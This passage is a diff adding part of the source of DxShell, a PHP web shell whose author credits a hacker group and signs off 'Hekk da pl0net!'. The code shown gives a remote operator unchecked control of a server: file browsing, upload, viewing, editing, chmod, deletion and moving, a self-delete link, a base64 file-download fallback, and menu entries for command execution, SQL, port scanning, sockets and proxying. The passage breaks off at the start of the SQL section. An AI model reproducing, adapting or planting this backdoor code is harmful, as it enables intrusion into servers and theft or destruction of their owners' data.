+textarea 		{color:#00FF00; background-color:#001000;border-color:#000000;border-width:0pt;border-style:solid;font-size:10pt;font-family:Arial;Padding:5pt;
+				Scrollbar-Face-Color: #00FF00; Scrollbar-Track-Color: #000500;
+				Scrollbar-Highlight-Color: #00A000;	Scrollbar-3dlight-Color: #00A000; Scrollbar-Shadow-Color: #005000;
+				Scrollbar-Darkshadow-Color: #005000;}
+select			{background-color:#001000;color:#00D000;border-color:#D0D000;border-width:1pt;border-style:solid dotted dotted solid;}
+
+A:Link, A:Visited { color: #00D000;	text-decoration: underline; }
+A.no:Link, A.no:Visited { color: #00D000;	text-decoration: none; }
+A:Hover, A:Visited:Hover , A.no:Hover, A.no:Visited:Hover { color: #00FF00; background-color:#003300; text-decoration: overline; }
+.Hover:Hover {color: #FFFF00; cursor:help;}
+.HoverClick:Hover {color: #FFFF00; cursor:crosshair;}
+span.margin		{margin: 0pt 10pt;}
+td.error {color:#000000; background-color: #FF0000; font-weight: bold; font-size: 11pt;}
+td.warning {color:#000000; background-color: #D00000; font-size: 11pt;}
+font.img_replacer {margin:1pt;padding:1pt;text-decoration: none;border-width:1pt;border-color:#D0D000;border-style:solid;}
+</style>
+
+<?php
+if (in_array($_GET['dxmode'], array('UPL', 'DIR', 'PRT')))
+	{  /* THIS FLOATING WINDOW IS ONLY SET FOR MODES: */?>
+<SCRIPT>
+var dom = document.getElementById?1:0;
+var ie4 = document.all && document.all.item;
+var opera = window.opera; //Opera
+var ie5 = dom && ie4 && !opera;
+var nn4 = document.layers;
+var nn6 = dom && !ie5 && !opera;
+var vers=parseInt(navigator.appVersion);
+var good_browser = (ie5 || ie4);
+function showwin(hdr,txt,w,vis)
+{
+if(good_browser)
+	{
+	var obj =  document.all('js_floatwin');
+	var evnt = event;
+	var xOffset = document.body.scrollLeft;
+	var yOffset = document.body.scrollTop;
+
+	var temp =
+	"<TABLE BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="+ w +">"
+	+((hdr!='')?("<TR><TD class=js_floatwin_header>"+ hdr + "</TD></TR>"):"")
+	+"<TR><TD class=js_floatwin_body>" + txt + "</TD></TR>"
+	+"</TABLE>";
+
+	if (vis == 1)
+		{
+		obj.innerHTML = temp;
+		obj.style.width = w;
+		hor = document.body.scrollWidth - obj.offsetWidth;
+		posHor = xOffset + evnt.clientX + 10;
+		posHor2 = xOffset + evnt.clientX - obj.offsetWidth - 5;
+		posVer = yOffset + evnt.clientY - obj.offsetHeight - 5;
+
+		if (posHor<hor)
+			obj.style.posLeft = posHor
+		else
+			obj.style.posLeft = posHor2;
+
+		obj.style.posTop = posVer;
+
+		obj.style.visibility = "visible";
+		}
+		else
+		{
+		obj.style.visibility = "hidden";
+		obj.style.posTop = 0;
+		obj.style.posLeft = 0;
+		}
+	}
+}
+function movewin()
+{
+if (good_browser)
+	{
+	var obj =  document.all('js_floatwin');
+	var evnt = event;
+	var xOffset = document.body.scrollLeft;
+	var yOffset = document.body.scrollTop;
+
+	hor = document.body.scrollWidth - obj.offsetWidth;
+	posHor = xOffset + evnt.clientX + 10;
+	posHor2 = xOffset + evnt.clientX - obj.offsetWidth - 5;
+	posVer = yOffset + evnt.clientY - obj.offsetHeight - 5;
+
+	if (posHor<hor)
+		obj.style.posLeft = posHor
+		else
+		obj.style.posLeft = posHor2;
+
+	obj.style.posTop = posVer;
+	}
+}
+</SCRIPT>
+<?php } /* /END */?>
+
+</head>
+<body>
+<?php
+if ($DXGLOBALSHIT) /* tries to kill all the fucking bug.php pre-output, if ob_clean() failed */
+	{	print str_repeat("\n", 10).'<!--SHIT KILLER-->';
+	print "\n".'</body></a>'.str_repeat('</table>', 5).str_repeat('</div>', 5).str_repeat('</span>', 5).str_repeat('</pre>', 1).str_repeat('</font>', 5).str_repeat('</script>', 2);
+	print "\n".'<TABLE WIDTH=100% BORDER=0  style="position:absolute;z-index:100;top:0pt;left:0pt;width:100%;height:100%;"><tr><td>';
+	print "\n\n\n\n";
+	}
+?>
+
+<div id="js_floatwin" style="z-index:50;position:absolute;left:0;top:0;visibility:hidden"></div>
+<table width=100% cellspacing=0 cellpadding=0 class=outset>
+<tr>
+	<td width=100pt class=h2_oneline><a href="<?=DxURL('kill', '');?>&dxmode=WTF" class=no><h1>DxShell<br>v<?=$GLOB['SHELL']['Ver'];?></td>
+	<td>
+<?php
+print "\n".'<div style="margin-right:'.(  ((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2)?'100':'30'  ).'pt;">';
+print "\n".(  ($DXGLOBALSHIT)?'<font color=#FF0000><b>GLOBALSHIT</b></font> ; ':''  );
+print "\n".DxPrint_ParamState('php_ver', 		phpversion()						).' ; ';
+print "\n".DxPrint_ParamState('php_Safe_Mode', 	$GLOB['PHP']['SafeMode'], '!'		).' ; ';
+print "\n".DxPrint_ParamState('magic_quotes', 	(bool)get_magic_quotes_gpc(), '!'	).' ; ';
+print "\n".DxPrint_ParamState('gZip', 			function_exists('gzencode')			).' ; ';
+print "\n".DxPrint_ParamState('cURL', 			function_exists('curl_version')		).' ; ';
+print "\n".DxPrint_ParamState('MySQL', 			function_exists('mysql_connect')	).' ; ';
+print "\n".DxPrint_ParamState('MsSQL', 			function_exists('mssql_connect')	).' ; ';
+print "\n".DxPrint_ParamState('PostgreSQL', 	function_exists('pg_connect')		).' ; ';
+print "\n".DxPrint_ParamState('Oracle', 		function_exists('ocilogon')			).' ; ';
+print "\n".'Disabled functions: '.((($df=@ini_get('disable_functions'))=='')?'<font color=#00FF00><b>NONE</b></font>':'<font color=#FF0000><b>'.str_replace(array(',',';'), ', ', $df).'</b></font>');
+print "\n".'</div>';
+
+print "\n\n".'<span align=right style="position:absolute;z-index:1;right:0pt;top:0pt;"><table><tr><td class="h2_oneline"><nobr>';
+if ((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2)
+	print "\n".'<a href="'.DxURL('kill', 'dxinstant').'&dxinstant=logoff" title="Log Off" class=no>[Exit]</a>';
+print "\n".'<a href="'.DxURL('kill', 'dxinstant').'&dxinstant=DEL" title="Delete self ('.basename($_SERVER['PHP_SELF']).')" class=no><font color=#FF0000;>'.DxImg('del').'</font></a>';
+print "\n".'</nobr></td></tr></table></span>';
+
+print "\n\n".'<hr>';
+print "\n".'Disk free: <b>'.DxStr_FmtFileSize(disk_free_space($GLOB['FILES']['CurDIR'])).' / '.DxStr_FmtFileSize(disk_total_space($GLOB['FILES']['CurDIR'])).'</b> ; ';
+print "\n".'OS: <b>'.$GLOB['SYS']['OS']['id'].' ('.$GLOB['SYS']['OS']['Full'].' )</b> ; ';
+print "\n".'Yer_IP: <b>'.@$_SERVER['REMOTE_ADDR'].' ('.@$_SERVER['REMOTE_HOST'].')</b> ; ';
+print "\n".'<nobr>Own/U/G/Pid/Inode:<wbr><b>'.get_current_user().' / '.getmyuid().' / '.getmygid().' / '.getmypid().' / '.getmyinode().'</b> ; </nobr>';
+print "\n".'MySQL : <b>'.@mysql_get_server_info().'</b> ; ';
+print "\n".'<br>'.@$_SERVER['SERVER_SOFTWARE'];
+?>
+	</td>
+</table>
+<table width=100% cellspacing=0 cellpadding=0 class=outset>
+<tr>
+	<td width=100pt class=h2_oneline><h2>Modes</td>
+	<td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('kill', '');?>&dxmode=DIR">DIR</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=F_VIEW">VIEW</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=FTP<?=((!empty($_GET['dxdir']))?'&dxdir='.$_GET['dxdir']:'');?>">FTP</a>
+	<td><font class=highlight_txt><big><b>II</td><td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('leave', 'dxsql_s,dxsql_l,dxsql_p,dxsql_d');?>&dxmode=SQL">SQL</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PHP">PHP</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=COOK">COOKIE</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=CMD">CMD</a>
+	<td><font class=highlight_txt><big><b>II</td><td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('kill', '');?>&dxmode=MAIL">MAIL</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=STR">STR</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PRT">PORTSCAN</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=SOCK">SOCK</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PROX">PROXY</a>
+	</td>
+	</tr>
+</table>
+
+<?php $DX_Header_drawn=true; ?>
+
+<?php
+#################################################
+########
+########   DXGLOBALSHIT DOWNLOADER
+########
+if (isset($DxDOWNLOAD_File)) /* only when DXGLOBALSHIT is enabled */
+	{	print "\n".'<table align=center><tr><td class=mode_header><b>Download file</td></tr></table>';
+	print "\n".'The fact you see this means that "'.basename($_SERVER['PHP_SELF']).'" has fucked up the output with it\'s shit, so no headerz could be sent =((';
+	print "\n".'<br>Exclusively, DxShell is proud to present an additional way to download files...Just execute the php-script given below, and it will make the file u\'re trying to download';
+
+	if ($GLOB['SYS']['GZIP']['CanUse'])  $DxDOWNLOAD_File['content']=gzcompress($DxDOWNLOAD_File['content'], 6);
+
+	print "\n\n".'<br><br>';
+	print "\n".'<textarea rows=30 style="width:90%" align=center>';
+	print "\n".'<?php'."\n".' //Execute this, and you\'ll get the requested "'.$DxDOWNLOAD_File['filename'].'" in the same folder with the script ;)';
+	print "\n".'// The file is '.(  ($GLOB['SYS']['GZIP']['CanUse'])?'gzcompress()ed and':''  ).' base64_encode()ed';
+	print "\n\n".'$encoded_file=\''.base64_encode($DxDOWNLOAD_File['content']).'\';';
+	print "\n\n\n\n";
+	print "\n".'$f=fopen(\''.$DxDOWNLOAD_File['filename'].'\', \'w\');';
+	print "\n".'fputs($f, '.(  ($GLOB['SYS']['GZIP']['CanUse'])?'gzuncompress(base64_decode($encoded_file))':'base64_decode($encoded_file)'  ).');';
+	print "\n".'fclose($f);';
+	print "\n".'//Yahoo, hacker, the file is here =)';
+	print "\n".'?>';
+	print "\n".'</textarea>';
+	die();
+	}
+
+?>
+
+<table align=center>
+	<tr><td class=mode_header>
+	@MODE: <b><?=$GLOB['DxMODES'][$_GET['dxmode']];?>
+	</td></tr></table>
+<?
+
+########
+########   AboutBox
+########
+if ($_GET['dxmode']=='WTF')
+	{
+	?>
+<table align=center class=nooooneblya><tr><td><div align=center>
+<?php
+print '<a href="http://hellknights.void.ru/">'.DxImg('exec').'</a>';
+print '<br>o_O Tync, ICQ# 244-648';
+?><br><br>
+<textarea name="LolBox" class=bout style="width:500pt; height:500pt;"></textarea></table>
+<SCRIPT language=Javascript><!--
+var tl=new Array(
+"Kilobytes of c0de, litres of beer, kilometers of cigarettes (*no drugs*), and for what purpose?",
+"What's wrong with other shells?",
+"Usability, functionality, bugs?... NO.",
+"The main bug is: these shells ARE NOT mine =)",
+"Just like to be responsible for every motherfucking byte of code.",
+"Enjoy!",
+"-----------------------------------",
+"o_O Tync, http://hellknights.void.ru/, ICQ#244648",
+"DxShell v<?=$GLOB['SHELL']['Ver'].', date '.$GLOB['SHELL']['Date'];?>",
+"",
+"Greetz to: ",
+"iNfantry the Ruler",
+"Nik8 the Hekker",
+"_1nf3ct0r_ the Father",
+"Industry of Death the betatest0r =)",
+"",
+"Thanks to:",
+"Dunhill the cigarettes, Tuborg the beer, PHP the language, Nescafe the Coffee, Psychedelic the Music",
+"",
+"Wartime testers & debuggers ::: =))) :::",
+"MINDGROW",
+"",
+"",
+"Hekk da pl0net!",
+"--- EOF ---"
+);
+var speed=40;var index=0; text_pos=0;var str_length=tl[0].length;var contents, row;
+function type_text()
+{contents='';row=Math.max(0,index-50);
+while(row<index) contents += tl[row++] + '\r\n';
+document.getElementById("LolBox").value = contents + tl[index].substring(0,text_pos)+'|';
+if(text_pos++==str_length)
+	{text_pos=0;index++;
+	if(index!=tl.length)
+	{str_length=tl[index].length;setTimeout("type_text()",1000);
+	}
+	} else setTimeout("type_text()",speed);
+}type_text();
+//-->
+</SCRIPT>
+	<?php
+	}
+
+
+		###################################
+
+########
+########   Upload file
+########
+if ($_GET['dxmode']=='UPL')
+	{
+	if (empty($_POST['dxdir']) AND empty($_GET['dxdir'])) die(DxError('Uploading without selecting directory $_POST/$_GET[\'dxdir\'] is restricted'));
+
+	if (isset($_FILES['dx_uplfile']['tmp_name']))
+		{
+		$GETFILE=file_get_contents($_FILES['dx_uplfile']['tmp_name']);
+		DxFiles_UploadHere($_POST['DxFTP_FileTO'], $_FILES['dx_uplfile']['name'], $GETFILE);
+		}
+		else
+		{
+		print "\n".'<form action="'.DxURL('leave','dxmode,dxsimple').'" enctype="multipart/form-data" method=POST>';
+		print "\n".'<input type="hidden" name="MAX_FILE_SIZE" value="'.$GLOB['PHP']['upload_max_filesize'].'">';
+		print "\n".'<font class="highlight_txt">Max: '.DxStr_FmtFileSize($GLOB['PHP']['upload_max_filesize']).'</font>';
+		print "\n".'<br><input type=text name="dxdir" value="'.$_GET['dxdir'].'" SIZE=50>';
+		print "\n".'<br><input type=file name="dx_uplfile" SIZE=50>';
+		print "\n".'<input type=submit value="Upload" class="submit"></form>';
+		}
+	}
+
+		###################################
+
+########
+########   Directory listings
+########
+if ($_GET['dxmode']=='DIR')
+	{
+	if (empty($_GET['dxdir'])) $_GET['dxdir']=realpath($GLOB['FILES']['CurDIR']);
+	$_GET['dxdir']=DxFileOkaySlashes($_GET['dxdir']);
+	if (substr($_GET['dxdir'], -1,1)!='/') $_GET['dxdir'].='/';
+
+	print "\n".'<br><form action="'.DxURL('kill', '').'" method=GET style="display:inline;">';
+	DxGETinForm('leave', 'dxmode');
+	print "\n".'<input type=text name="dxdir" value="'.DxFileOkaySlashes(realpath($_GET['dxdir'])).'" SIZE=40>';
+	print "\n".'<input type=submit value="Goto" class="submit"></form>';
+
+	print "\n".'<br>'.'<b>&gt;&gt; <b>'.$_GET['dxdir'].'</b>';
+	if (!file_exists($_GET['dxdir'])) die(DxError('No such directory'));
+	if (!is_dir($_GET['dxdir'])) 	  die(DxError('It\'s a file!! What do you think about listing files in a file? =)) '));
+
+	if (isset($_GET['dxparam']))
+		{		if ($_GET['dxparam']=='mkDIR')  if (	!mkdir($_GET['dxdir'].'__DxS_NEWDIR__'.DxRandomChars(3))	) DxError('Unable to mkDir. Perms?');
+		if ($_GET['dxparam']=='mkFILE') if (	!touch($_GET['dxdir'].'__DxS_NEWDIR__'.DxRandomChars(3))	) DxError('Unable to mkFile. Perms?');
+		}
+
+	if (!($dir_ptr=opendir($_GET['dxdir']))) die(DxError('Unable to open dir for reading. Perms?...'));
+	$FILES=array('DIRS' => array(), 'FILES' => array());
+	while (!is_bool( $file = readdir($dir_ptr)  ) )
+		if (($file!='.') and ($file!='..'))		if (is_dir($_GET['dxdir'].$file)) $FILES['DIRS'][]=$file; else $FILES['FILES'][]=$file;
+	asort($FILES['DIRS']);asort($FILES['FILES']);
+
+	print "\n".'<span style="position:absolute;right:0pt;">';
+	if (isset($_GET['dxdirsimple']))	print '<a href="'.DxURL('kill', 'dxdirsimple').'">[Switch to FULL]</a>';
+		else					print '<a href="'.DxURL('leave', '').'&dxdirsimple=1">[Switch to LITE]</a>';
+	print '</span>';
+
+	$folderup_link=explode('/',$_GET['dxdir'].'../');
+	if (!empty($folderup_link[   count($folderup_link)-3   ]) AND ($folderup_link[   count($folderup_link)-3   ]!='..'))
+		unset($folderup_link[   count($folderup_link)-3   ], $folderup_link[   count($folderup_link)-1   ]);
+	$folderup_link=implode('/', $folderup_link);
+	print "\n".str_repeat('&nbsp;',3).'<a href="'.DxURL('leave', 'dxdirsimple').'&dxmode=DIR&dxdir='.$folderup_link.'" class=no>'
+						.DxImg('foldup').' ../</a>';
+
+	print "\n".str_repeat('&nbsp;', 15).'<font class=highlight_txt>MAKE: </font>'
+		.'<a href="'.DxURL('leave', 'dxmode,dxdir,dxdirsimple').'&dxparam=mkDIR">Dir</a>'
+		.' / '
+		.'<a href="'.DxURL('leave', 'dxmode,dxdir,dxdirsimple').'&dxparam=mkFILE">File</a>'
+		.' / '.str_repeat('&nbsp;',5)
+		.'<font class=highlight_txt>UPLOAD: </font>'
+		.'<a href="'.DxURL('leave', 'dxdirsimple').'&dxdir='.DxFileToUrl($_GET['dxdir']).'&dxmode=UPL">Form</a>'
+		.' / '
+		.'<a href="'.DxURL('leave', 'dxdirsimple').'&dxdir='.DxFileToUrl($_GET['dxdir']).'&dxmode=UPL">FTP</a>'
+		;
+
+	print "\n".'<br>'.count($FILES['DIRS']).' dirs, '.count($FILES['FILES']).' files ';
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 ><COL span=15 class="linelisting">';
+	for ($NOWi=0;$NOWi<=1;$NOWi++)
+		for ($NOW=($NOWi==0)?'DIRS':'FILES', $i=0;$i<count($FILES[$NOW]);$i++)
+			{			$cur=&$FILES[$NOW][$i];
+			$dircur=$_GET['dxdir'].$cur;
+			print "\n".'<tr>';
+			print "\n\t".'<td class=linelisting '.((isset($_GET['dxdirsimple']) AND ($NOW=='DIRS'))?'colspan=2':'').'>'
+							.(($NOW=='DIRS')?DxImg('folder').' '
+							.				 '<a href="'.DxURL('leave', 'dxdirsimple').'&dxmode=DIR&dxdir='.DxFileToUrl($dircur).'" class=no>':'')
+							.(($NOW=='FILES')?'<a href="'.DxURL('kill', '').'&dxmode=F_VIEW&dxfile='.DxFileToUrl($dircur).'" class=no>':'')
+							.htmlspecialchars($cur).'</td>';
+
+			if (!isset($_GET['dxdirsimple']))
+				{
+				print "\n\t".'<td class=linelisting>'
+					.'<span '.DxDesign_DrawBubbleBox('File Info',    '<b>Create time:</b><br>'.DxDate(@filectime($dircur)).'<br>'
+															 		.'<b>Modify time:</b><br>'. DxDate(@filemtime($dircur)).'<br>'
+															 		.'<b>Owner/Group:</b><br>'.(@fileowner($dircur)).' / '.(@filegroup($dircur))
+															 		, 150).' class=Hover><b>INFO</span> </td>';
+				print "\n\t".'<td class=linelisting '.(($NOW=='DIRS')?'colspan=2':'').'>'
+					.((($i+$NOWi)==0)?'<span '.DxDesign_DrawBubbleBox('Perms legend', '1st: sticky bit:<br>"<b>S</b>" Socket, "<b>L</b>" Symbolic Link, "<b>&lt;empty&gt;</b>" Regular, "<b>B</b>" Block special, "<b>D</b>" Directory, "<b>C</b>" Character special, "<b>P</b>" FIFO Pipe, "<b>?</b>" Unknown<br>Others: Owner/Group/World<br>"<b>r</b>" Read, "<b>w</b>" Write, "<b>x</b>" Execute<br><br><b>Click to CHMOD', 400).' class=Hover>':'')
+					.'<a href="'.DxURL('kill', '').'&dxmode=F_CHM&dxfile='.DxFileToUrl($dircur).'" class=no>'.DxChmod_Oct2Str(@fileperms($dircur)).'</td>';
+				}
+
+			if ($NOW!='DIRS') print "\n\t".'<td class=linelisting style="text-align:right;">'.DxStr_FmtFileSize(@filesize($dircur)).'</td>';
+
+			if (!isset($_GET['dxdirsimple']))
+				{
+				if ($NOW=='DIRS') print "\n\t".'<td class=linelisting colspan='.(($GLOB['SYS']['GZIP']['IMG'])?'4':'3').'>&nbsp;</td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($dircur).'" target=_blank>'.DxImg('view').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_ED&dxfile='.DxFileToUrl($dircur).'">'.DxImg('ed').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($dircur).'">'.DxImg('downl').'</a></td>';
+				if (($NOW!='DIRS') AND ($GLOB['SYS']['GZIP']['IMG'])) print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dx_gzip=Yeah&dxfile='.DxFileToUrl($dircur).'">'.DxImg('gzip').'</a></td>';
+				print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_REN&dxfile='.DxFileToUrl($dircur).'">'.DxImg('rename').'</a></td>';
+				print "\n\t".'<td class=linelisting '.(($NOW=='DIRS')?'colspan=3':'').'><a href="'.DxURL('kill', '').'&dxmode=F_DEL&dxfile='.DxFileToUrl($dircur).'">'.DxImg('del').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_COP&dxfile='.DxFileToUrl($dircur).'">'.DxImg('copy').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_MOV&dxfile='.DxFileToUrl($dircur).'">'.DxImg('move').'</a></td>';
+				}
+			print "\n\t".'</tr>';
+			}
+	print "\n".'</table>';
+	}
+
+
+########
+########   File Global Actions
+########
+if ('F_'==substr($_GET['dxmode'],0,2))
+	{	if (empty($_GET['dxfile']))
+		{		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', '');
+		print "\n".'<input type=text name="dxfile" value="" style="width:70%;">';
+		print "\n".'<br><input type=submit value="Select" class="submit">';
+		print "\n".'</form>';
+		}
+	if (!file_exists(@$_GET['dxfile']))  die(DxError('No such file'));
+	print "\n\n".'<a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])).'">[Go DIR]</a>';
+	}
+
+########
+########   File CHMOD
+########
+if ($_GET['dxmode']=='F_CHM')
+	{
+	if (isset($_GET['dxparam']))
+		{		if (chmod($_GET['dxfile'], octdec((int)$_GET['dxparam']))==FALSE)
+			print DxError('Chmod "'.$_GET['dxfile'].'" failed');
+			else print 'CHMOD( <font class=highlight_txt>'.$_GET['dxfile'].'</b></font> )...<b>OK</b>';
+		}
+		else
+		{		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxfile');
+		print "\n".'CHMOD( <font class=highlight_txt>'.$_GET['dxfile'].'</font> )';
+		print "\n".'<br><input type=text name="dxparam" value="'.
+			//decoct(fileperms($_GET['dxfile']))
+			substr(sprintf('%o', fileperms($_GET['dxfile'])), -4)
+			.'">';
+		print "\n".'<input type=submit value="chmod" class="submit"></form>';
+		}
+	}
+
+########
+########   File View
+########
+if ($_GET['dxmode']=='F_VIEW')
+	{
+	if (!is_file($_GET['dxfile']))  	die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+	if (!is_readable($_GET['dxfile']))  die(DxError('File is not readable. Perms?...'));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 align=right><tr>';
+	print "\n".'<td><h3>'.$_GET['dxfile'].'</h3></td>';
+	print "\n".'<td>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($_GET['dxfile']).'" target=_blank>'.DxImg('view').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_ED&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('ed').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('downl').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DEL&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('del').'</a>'
+		.'</td>';
+	print "\n".'</tr></table><br>';
+	print "\n".'Tip: to view the file "as is" - open the page in <a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($_GET['dxfile']).'">source</a> (<i>works best in Opera</i>), or <a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($_GET['dxfile']).'">download</a> this file';
+
+	print "\n\n\n".'<br><hr><!-- File contents goes from here -->'."\n";
+	print "\n".'<plaintext>';
+	print file_get_contents($_GET['dxfile']);
+	die(); /* Plaintext is infinite */
+	}
+
+########
+########   File Edit
+########
+if ($_GET['dxmode']=='F_ED')
+	{
+	if (!is_file($_GET['dxfile']))  	die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+	if (isset($_POST['dxparam']))
+		{		if (!is_writable($_GET['dxfile']))  die(DxError('File is not writable. Perms?...'));
+		if (($f=fopen($_GET['dxfile'], 'w'))===FALSE) die(DxError('File open for WRITE failed'));
+		if (fputs($f, $_POST['dxparam'])===FALSE)	die(DxError('I/O: File write failed'));
+		fclose($f);
+		print 'File saved OK;';
+		}
+		else
+		{
+		if (!is_readable($_GET['dxfile']))  die(DxError('File is not readable. Perms?...'));
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');		print "\n".'<font class=highlight_txt>'.$_GET['dxfile'].'</font>';
+		print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+		print "\n".'<textarea name="dxparam" rows=30 style="width:90%;">'.str_replace(array('<','>'),array('&lt;','&gt;'), file_get_contents($_GET['dxfile'])).'</textarea>';
+		print "\n".'<br><input type=submit value="Save" style="width:100pt;height:50pt;font-size:15pt;" class=submit>';
+		print "\n".'</form>';
+		}
+	}
+
+########
+########   File Delete
+########
+if ($_GET['dxmode']=='F_DEL')
+	{		if (isset($_GET['dx_ok']))
+			{		if ($_GET['dx_ok']=='Yes')
+			{			if (	(is_file($_GET['dxfile']) AND !unlink($_GET['dxfile']))  OR  (is_dir($_GET['dxfile']) AND !rmdir($_GET['dxfile']))		)
+				print DxError('Unable to delete file. Perms?...<br>');
+				else
+				{				print "\n".'Delete( <font class=highlight_txt>'.$_GET['dxfile'].'</font> ) <b>OK</b>';
+				DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+				}
+			}
+		}
+		else
+		{
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxfile');
+		print "\n".'<table border=0 cellspacing=0 cellpadding=0 align=center><tr><td>'
+					."\n".'<font class=achtung>(!)</font> Do you really want to <font class=highlight_txt>DELETE '.$_GET['dxfile'].'</font> ?'
+					."\n".'<div align=right><input type=submit name="dx_ok" value="No" class=bt_No><input type=submit name="dx_ok" value="Yes" class=bt_Yes>'
+					."\n".'</td></tr></table>';
+		print "\n".'</form>';
+		}
+	}
+
+########
+########   File Rename
+########
+if ($_GET['dxmode']=='F_REN')
+	{
+	if (isset($_POST['dxparam']))
+		{
+		if (!rename($_GET['dxfile'], dirname($_GET['dxfile']).'/'.$_POST['dxparam']))
+			print DxError('Unable to rename. Perms?...<br>');
+			else
+			{
+			print "\n".'Rename( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.dirname($_GET['dxfile']).'/'.$_POST['dxparam'].'</font> ) <b>OK</b>';
+			DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+			}
+		}
+		else
+		{
+		print "\n".'<form action="'.DxURL('leave', 'dxmode,dxfile').'" method=POST>';
+		print "\n".'<input type=text name="dxparam" value="'.basename($_GET['dxfile']).'" style="width:80%">';
+		print "\n".'<input type=submit value="Rename" class="submit"></form>';
+		}
+	}
+
+########
+########   File Copy
+########
+if ($_GET['dxmode']=='F_COP')
+	{
+	if (!is_file($_GET['dxfile'])) die(DxError('Don\'t even think about copuing directories! =))'));
+
+	$newname=$_GET['dxfile'].'__DxS_COPY_'.DxRandomChars(3);
+	if (($extpos=strrpos($_GET['dxfile'], '.'))>strrpos($_GET['dxfile'], '/')) /* file has an extension */
+		$newname=substr($_GET['dxfile'], 0, $extpos).'__DxS_COPY_'.DxRandomChars(3).substr($_GET['dxfile'], $extpos);
+	print $newname;
+	if (!copy($_GET['dxfile'], $newname))
+		print DxError('Unable to copy. Perms?...<br>');
+		else
+		{
+		print "\n".'Copy( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.$newname.'</font> ) <b>OK</b>';
+		DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+		}
+	}
+
+########
+########   File Move
+########
+if ($_GET['dxmode']=='F_MOV')
+	{
+	if (isset($_POST['dxparam']))
+		{
+		if (!rename($_GET['dxfile'], $_POST['dxparam']))
+			print DxError('Unable to rename. Perms? Or no path?...<br>');
+			else
+			{
+			print "\n".'Move( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.$_POST['dxparam'].'</font> ) <b>OK</b>';
+			DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_POST['dxparam'])));
+			}
+		}
+		else
+		{
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');
+		print "\n".'<form action="'.DxURL('leave', 'dxmode,dxfile').'" method=POST>';
+		print "\n".'<input type=text name="dxparam" value="'.DxFileOkaySlashes(realpath($_GET['dxfile'])).'" style="width:80%">';
+		print "\n".'<input type=submit value="M0ve" class="submit"></form>';
+		}
+	}
+
+if (substr($_GET['dxmode'],0,2)=='F_')
+	{/* file actions */
+	print "\n\n".'<br><br>'.'<a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])).'">[Go DIR]</a>';
+	}
+
+		###################################
+
+########
+########   SQL Maintenance
+########
+if ($_GET['dxmode']=='SQL')
+	{	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p']))
